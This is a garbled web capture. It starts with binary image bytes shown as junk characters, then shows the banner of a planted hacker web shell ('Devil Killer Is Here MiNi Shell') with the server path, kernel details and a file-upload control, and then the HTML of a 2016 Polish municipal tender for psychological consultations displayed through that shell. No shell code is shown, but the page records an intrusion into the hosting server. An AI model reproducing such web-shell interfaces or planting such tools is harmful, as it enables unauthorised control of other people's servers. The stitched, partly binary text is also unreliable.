JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160414/87868-N-2016.html

<p class="kh_header"><b>Mysłowice: Szkolenia w zakresie aktywizacji społecznej 
uczestników projektu Ja= Sukces</b><br>
<b>Numer ogłoszenia: 87868 - 2016; data zamieszczenia: 14.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Gwarków 24, 41-400 Mysłowice, woj. śląskie, tel. 032 2221289, faks 032 2221289.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mops.myslowice.bip.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia w zakresie aktywizacji społecznej 
uczestników projektu Ja= Sukces.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1:
Indywidualne konsultacje psychologiczne dla osób przebywających bądź opuszczających pieczę zastępczą oraz młodzieży uczącej się, pochodzącej z rodzin zagrożonych wykluczeniem społecznym.
Termin: 04.05.2016r. - 18.06.2016r. (dni robocze, pn-pt, w godz. 14.00-19.00) Spotkania z psychologiem będą musiały być ustalane indywidualnie z każdym z uczestników, tak by nie kolidowały z zajęciami szkolnymi oraz pozaszkolnymi. Zamawiający zapłaci Wykonawcy tylko za przeprowadzone godziny konsultacji (na podstawie list obecności).
Przewidywana liczba uczestników: 20 osób w wieku 11-21 lat (osoby przebywające bądź opuszczające pieczę zastępczą oraz młodzież ucząca się pochodząca z rodzin zagrożonych wykluczeniem społecznym)
Czas trwania: 3h/uczestnika (3 spotkania po 1h zegarowej)
Warunki realizacji:
Konsultacje powinny odbywać się na terenie Mysłowic, w pobliżu Centrum oraz przystanku komunikacji miejskiej(w załączeniu mapka). Wykonawca powinien zapewnić uczestnikom salę spełniającą wymogi sanitarne oraz  zapewniającą uczestnikowi poczucie bezpieczeństwa i dyskrecji. Wykonawca oznaczy pomieszczenie, w którym realizowane będą konsultacje zgodnie z logotypami otrzymanymi przez Zamawiającego. 
Program konsultacji powinien zostać dostosowany do indywidualnych problemów uczestnika, może zawierać m.in. następującą tematykę:
- radzenie sobie ze stresem i innymi negatywnymi emocjami
- komunikacja interpersonalna, asertywność
- budowanie poczucia własnej wartości i pozytywnej samooceny
- analiza możliwości dalszego kształcenia i podnoszenia kwalifikacji
- rozbudzanie potrzeby rozwoju osobistego i wzmacnianie motywacji
- wsparcie w rozwiązywaniu indywidualnych  problemów
Wykonawca zobowiązany jest do prowadzenia list obecności opatrzonych wymaganymi logotypami (udostępnionymi przez  zamawiającego).
Indywidualne konsultacje powinny zakończyć się wydaniem odpowiedniego zaświadczenia, opatrzonego wymaganymi logotypami (udostępnionymi przez  zamawiającego
Kadra
Wykonawca zapewni odpowiednio wykwalifikowaną kadrę, której powierzy realizację przedmiotu  zamówienia. 
Wymagania wobec kadry prowadzącej kurs:
- wykształcenie wyższe  psychologiczne 
- doświadczenie w prowadzeniu indywidualnych konsultacji psychologicznych dla osób przebywających bądź opuszczających pieczę zastępczą oraz młodzieży uczącej się, pochodzącej z rodzin zagrożonych wykluczeniem społecznym
Pod uwagę brane będą następujące czynniki: cena za 1 godzinę zegarową konsultacji i doświadczenie kadry prowadzącej konsultacje
Część 2:
Indywidualne konsultacje psychologiczne dla osób bezrobotnych lub nieaktywnych zawodowo. 
Termin: 04.05.2016r. - 18.06.2016r. (dni robocze, pn-pt, w godz. 9.00-15.00) Spotkania z psychologiem będą musiały być ustalane  indywidualnie z każdym z uczestników. Pierwsze terminy konsultacji ustali Zamawiający, kolejne będą ustalane przez psychologa prowadzącego konsultacje indywidualnie z każdym z uczestników. Zamawiający zapłaci Wykonawcy tylko za przeprowadzone godziny konsultacji (na podstawie list obecności).
Przewidywana liczba uczestników: 14 osób (osoby bezrobotne lub nieaktywne zawodowo)
Czas trwania: 3h/uczestnika (3 spotkania po 1h zegarowej)
Warunki realizacji:
Miejsce realizacji:
Konsultacje powinny odbywać się na terenie Mysłowic, w pobliżu Centrum oraz przystanku komunikacji miejskiej(w załączeniu mapka). Wykonawca powinien zapewnić uczestnikom salę spełniającą wymogi sanitarne oraz  zapewniającą poczucie bezpieczeństwa i dyskrecji. Wykonawca oznaczy pomieszczenie, w którym realizowane będą konsultacje zgodnie z logotypami otrzymanymi przez Zamawiającego. 
Program konsultacji powinien zostać dostosowany do indywidualnych problemów uczestnika, może zawierać m.in. następującą tematykę:
- radzenie sobie ze stresem i innymi negatywnymi emocjami
- komunikacja interpersonalna, asertywność
- budowanie poczucia własnej wartości i pozytywnej samooceny
- analiza możliwości dalszego kształcenia i podnoszenia kwalifikacji
- rozbudzanie potrzeby rozwoju osobistego i wzmacnianie motywacji
- wsparcie w rozwiązywaniu indywidualnych  problemów stanowiących barierę w powrocie na rynek pracy.
Wykonawca zobowiązany jest do prowadzenia list obecności opatrzonych wymaganymi logotypami (udostępnionymi przez  zamawiającego). 
Indywidualne konsultacje powinny zakończyć się wydaniem odpowiedniego zaświadczenia, opatrzonego wymaganymi logotypami (udostępnionymi przez  zamawiającego
Kadra
Wykonawca zapewni odpowiednio wykwalifikowaną kadrę, której powierzy realizację przedmiotu zamówienia. 
Wymagania wobec kadry prowadzącej kurs:
- wykształcenie wyższe  psychologiczne 
- doświadczenie w prowadzeniu indywidualnych konsultacji psychologicznych dla osób bezrobotnych lub nieaktywnych zawodowo.
Pod uwagę brane będą następujące czynniki: cena za 1 godzinę zegarową konsultacji doświadczenie kadry prowadzącej konsultacje.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku nastąpi na podstawie oświadczenia którego wzór stanowi załącznik nr 1/1B na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku nastąpi na podstawie oświadczenia którego wzór stanowi załącznik nr 1/1B na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku nastąpi na podstawie oświadczenia którego wzór stanowi załącznik nr 1/1B na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykazanie, że kadra przewidziana do przeprowadzenia indywidualnych konsultacji psychologicznych posiadała następujące doświadczenie oraz wykształcenie: 
Dla części 1:
W ciągu ostatnich 3 lat od ogłoszenia zamówienia posiada doświadczenie w prowadzeniu indywidualnych konsultacji psychologicznych dla osób przebywających bądź opuszczających pieczę zastępczą oraz młodzieży uczącej się, pochodzącej z rodzin zagrożonych wykluczeniem społecznym- należy wykazać przeprowadzenie takich konsultacji dla min. 10 osób.
- wykształcenie: posiada wykształcenie wyższe psychologiczne.
Dla części 2:
W ciągu ostatnich 3 lat od ogłoszenia zamówienia posiada doświadczenie w prowadzeniu indywidualnych konsultacji psychologicznych dla osób bezrobotnych lub nieaktywnych zawodowo - należy wykazać przeprowadzenie takich konsultacji dla min. 10 osób.
- wykształcenie: posiada wykształcenie wyższe psychologiczne.
Opis sposobu dokonania oceny tego warunku: na podstawie oświadczenia którego wzór stanowi załącznik nr 1 oraz wypełnionego załącznika nr 2 na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku nastąpi na podstawie oświadczenia którego wzór stanowi załącznik nr 1/1B na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - doświadczenie kadry - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany w zakresie osób prowadzących szkolenie pod warunkiem, że będą to osoby o doświadczeniu, wykształceniu i kwalifikacjach nie gorszych od doświadczenia, wykształcenia i kwalifikacji kadry wykazanej w załączniku 2 do oferty, miejsca szkolenia pod warunkiem, że będzie ono spełniać warunki określone w siwz oraz terminu realizacji umowy z przyczyn nie leżących po stronie wykonawcy (np. choroba uczestników szkolenia).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.myslowice.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS Mysłowice
ul.Gwarków 24
41-400 Mysłowice
pok. 14 w godzinach pracy zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2016 godzina 12:00, miejsce: MOPS Mysłowice
ul.Gwarków 24
41-400 Mysłowice
pok. 27 w godzinach pracy zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Indywidualne konsultacje psychologiczne dla osób przebywających bądź opuszczających pieczę zastępczą oraz młodzieży uczącej się, pochodzącej z rodzin zagrożonych wykluczeniem społecznym..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termin: 04.05.2016r. - 18.06.2016r. (dni robocze, pn-pt, w godz. 14.00-19.00) Spotkania z psychologiem będą musiały być ustalane indywidualnie z każdym z uczestników, tak by nie kolidowały z zajęciami szkolnymi oraz pozaszkolnymi. Zamawiający zapłaci Wykonawcy tylko za przeprowadzone godziny konsultacji (na podstawie list obecności).
Przewidywana liczba uczestników: 20 osób w wieku 11-21 lat (osoby przebywające bądź opuszczające pieczę zastępczą oraz młodzież ucząca się pochodząca z rodzin zagrożonych wykluczeniem społecznym)
Czas trwania: 3h/uczestnika (3 spotkania po 1h zegarowej)
Warunki realizacji:
Konsultacje powinny odbywać się na terenie Mysłowic, w pobliżu Centrum oraz przystanku komunikacji miejskiej(w załączeniu mapka). Wykonawca powinien zapewnić uczestnikom salę spełniającą wymogi sanitarne oraz  zapewniającą uczestnikowi poczucie bezpieczeństwa i dyskrecji. Wykonawca oznaczy pomieszczenie, w którym realizowane będą konsultacje zgodnie z logotypami otrzymanymi przez Zamawiającego. 
Program konsultacji powinien zostać dostosowany do indywidualnych problemów uczestnika, może zawierać m.in. następującą tematykę:
- radzenie sobie ze stresem i innymi negatywnymi emocjami
- komunikacja interpersonalna, asertywność
- budowanie poczucia własnej wartości i pozytywnej samooceny
- analiza możliwości dalszego kształcenia i podnoszenia kwalifikacji
- rozbudzanie potrzeby rozwoju osobistego i wzmacnianie motywacji
- wsparcie w rozwiązywaniu indywidualnych  problemów
Wykonawca zobowiązany jest do prowadzenia list obecności opatrzonych wymaganymi logotypami (udostępnionymi przez  zamawiającego).
Indywidualne konsultacje powinny zakończyć się wydaniem odpowiedniego zaświadczenia, opatrzonego wymaganymi logotypami (udostępnionymi przez  zamawiającego
Kadra
Wykonawca zapewni odpowiednio wykwalifikowaną kadrę, której powierzy realizację przedmiotu  zamówienia. 
Wymagania wobec kadry prowadzącej kurs:
- wykształcenie wyższe  psychologiczne 
- doświadczenie w prowadzeniu indywidualnych konsultacji psychologicznych dla osób przebywających bądź opuszczających pieczę zastępczą oraz młodzieży uczącej się, pochodzącej z rodzin zagrożonych wykluczeniem społecznym
Pod uwagę brane będą następujące czynniki: cena za 1 godzinę zegarową konsultacji i doświadczenie kadry prowadzącej konsultacje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie kadry - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Indywidualne konsultacje psychologiczne dla osób bezrobotnych lub nieaktywnych zawodowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termin: 04.05.2016r. - 18.06.2016r. (dni robocze, pn-pt, w godz. 9.00-15.00) Spotkania z psychologiem będą musiały być ustalane  indywidualnie z każdym z uczestników. Pierwsze terminy konsultacji ustali Zamawiający, kolejne będą ustalane przez psychologa prowadzącego konsultacje indywidualnie z każdym z uczestników. Zamawiający zapłaci Wykonawcy tylko za przeprowadzone godziny konsultacji (na podstawie list obecności).
Przewidywana liczba uczestników: 14 osób (osoby bezrobotne lub nieaktywne zawodowo)
Czas trwania: 3h/uczestnika (3 spotkania po 1h zegarowej)
Warunki realizacji:
Miejsce realizacji:
Konsultacje powinny odbywać się na terenie Mysłowic, w pobliżu Centrum oraz przystanku komunikacji miejskiej(w załączeniu mapka). Wykonawca powinien zapewnić uczestnikom salę spełniającą wymogi sanitarne oraz  zapewniającą poczucie bezpieczeństwa i dyskrecji. Wykonawca oznaczy pomieszczenie, w którym realizowane będą konsultacje zgodnie z logotypami otrzymanymi przez Zamawiającego. 
Program konsultacji powinien zostać dostosowany do indywidualnych problemów uczestnika, może zawierać m.in. następującą tematykę:
- radzenie sobie ze stresem i innymi negatywnymi emocjami
- komunikacja interpersonalna, asertywność
- budowanie poczucia własnej wartości i pozytywnej samooceny
- analiza możliwości dalszego kształcenia i podnoszenia kwalifikacji
- rozbudzanie potrzeby rozwoju osobistego i wzmacnianie motywacji
- wsparcie w rozwiązywaniu indywidualnych  problemów stanowiących barierę w powrocie na rynek pracy.
Wykonawca zobowiązany jest do prowadzenia list obecności opatrzonych wymaganymi logotypami (udostępnionymi przez  zamawiającego). 
Indywidualne konsultacje powinny zakończyć się wydaniem odpowiedniego zaświadczenia, opatrzonego wymaganymi logotypami (udostępnionymi przez  zamawiającego
Kadra
Wykonawca zapewni odpowiednio wykwalifikowaną kadrę, której powierzy realizację przedmiotu zamówienia. 
Wymagania wobec kadry prowadzącej kurs:
- wykształcenie wyższe  psychologiczne 
